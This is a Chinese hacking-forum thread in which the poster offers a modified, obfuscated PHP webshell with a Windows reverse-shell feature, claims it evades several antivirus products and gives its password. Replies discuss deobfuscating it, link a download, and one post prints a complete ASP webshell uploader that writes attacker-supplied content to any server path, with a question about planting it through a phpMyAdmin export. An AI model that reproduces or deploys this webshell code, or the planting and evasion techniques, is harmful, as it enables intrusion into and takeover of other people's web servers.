[原创]php木马修改增强版
文章作者:TTFCT信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
最先看到这个PHP马是在CN安全交流群里,发现之后,觉得他功能还不错,但是仍不完美,于是在他原来马的基础上加上了针对WIN下的反弹,修改了原来的MYSQL库管理功能(觉得他原来那个不太好)。
程序经过压缩处理,30K,过MCAFEE,NOD32,其它的不太清楚,请自己测试。
登陆密码: ttfct
如果你还有什么好的建议,请跟帖提出。
程序界面如下图:
[attach]10076[/attach]
[attach]10077[/attach] 不错的东西,现在还可以过卡巴!
用gzuncompress字符串解压~~~base64_decode解密!!!
不过,我没解出来!!!请搂主提示~~~ 如果实在想看源代码,直接用echo 写出来 哦,用echo这样就可以了!
那么就是说gzuncompress对解密没有影响了?! <?php
$str = '就在这里输入加密内容';
echo base64_decode($str);
?>
我答对了吗? CN群主都来了 [s:265]
4楼的,把eval 改成echo就行了 出现Call to undefined function: gzuncompress()错误~~是服务器不支持gzuncompress()函数吗? 这个是根据nstview改的吧。。我也很喜欢这个马的。有些思路很好(我觉得)。 [quote]引用第8楼xhming于2007-04-04 17:41发表的 :
出现Call to undefined function: gzuncompress()错误~~是服务器不支持gzuncompress()函数吗?[/quote]
不至于哦 ttfct . 你咋老改别人的东西 - -!。 上次好像还改了个海洋。。。 - -!
我这有个PERL马 你能改么? 11楼的兄弟,我对PERL不熟悉,SORRY 楼主大哥,改echo还是没用,不知道是不是后缀PHP的原因,怎么生成一个文件,把信息弄到生成的TXT里面去,初学PHP,好多函数还不会用
我就纳闷,ECHO函数应该没问题,结果没考虑到php后缀的文件就算ECHO,也是支持HTML语言的。。。结果,用迅雷就弄下来了,其实用
print 也可以,呵呵,在这里谢谢楼主提供思路,偶一个死读书,以前又没学过C,学PHP有点麻烦捏,希望楼主多发几篇关于PHP的文章,好让我等小菜学习学习
我抓下来了,放我空间上了
[url]http://foxnop.googlepages.com/php.rar[/url] 感觉这个比PHPSPY要好一些 看图片貌似那个MYSQL管理的是国外的一套程序吧,以前好象用过~ 解密后的代码,呵呵。 [quote]引用第14楼liuyes于2007-04-11 15:10发表的 :
解密后的代码,呵呵。[/quote]
没仔细看你解密后的代码。但是是错误的。
我这里放一个楼主加密前的代码。呵呵。
应该一模一样吧?这么马很老咯。不过MYSQL部分很不错。有空剥离出来。
附件是解密后可以用的WEBSHELL。 [quote]引用第16楼4ngel于2007-04-12 01:36发表的 :
没仔细看你解密后的代码。但是是错误的。
我这里放一个楼主加密前的代码。呵呵。
.......[/quote]
好像是有点问题,就是密码好像保存不了,请高人看看吧 我估计就是SESSION的问题了
session_start();和@session_start();有什么区别?
对PHP不甚了解 [s:289] 找到原因了,编码不对,记事本保存的时候我选择的是UTF-8,另存为ANSI编码的就OK了 [s:265] [quote]引用第18楼liuyes于2007-04-12 17:10发表的 :
我估计就是SESSION的问题了
session_start();和@session_start();有什么区别?
对PHP不甚了解 [s:289][/quote]
@加了这个不报错, 用phpmyadmin导出webshell时,
原来的代码:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
导出后却在后面加了\
<% dim objFSO %>
\
<% dim fdata %>
\
<% dim objCountFile %>
\
<% on error resume next %>
\
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
\
<% if Trim(request("syfdpath"))<>"" then %>
\
<% fdata = request("cyfddata") %>
\
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
\
<% objCountFile.Write fdata %>
\
<% if err =0 then %>
\
<% response.write "<font color=red>save Success!</font>" %>
\
<% else %>
\
<% response.write "<font color=red>Save UnSuccess!</font>" %>
\
<% end if %>
\
<% err.clear %>
\
<% end if %>
\
<% objCountFile.Close %>
\
<% Set objCountFile=Nothing %>
\
<% Set objFSO = Nothing %>
\
<% Response.write "<form action='' method=post>" %>
\
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\\web\\x.asp):</font>" %>
\
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
\
<% Response.Write "<br>" %>
\
<% Response.write "本文件绝对路径" %>
\
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
\
<% Response.write "<br>" %>
\
<% Response.write "输入马的内容:" %>
\
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
\
<% Response.write "<input type=submit value=保存>" %>
\
<% Response.write "</form>" %>
我用了好几种加密后,效果还是一样?
怎么帮啊?谢谢了 导出个一句话就OK了。没必要用这么大的 *** 作者被禁止或删除 内容自动屏蔽 ***
页:
[1]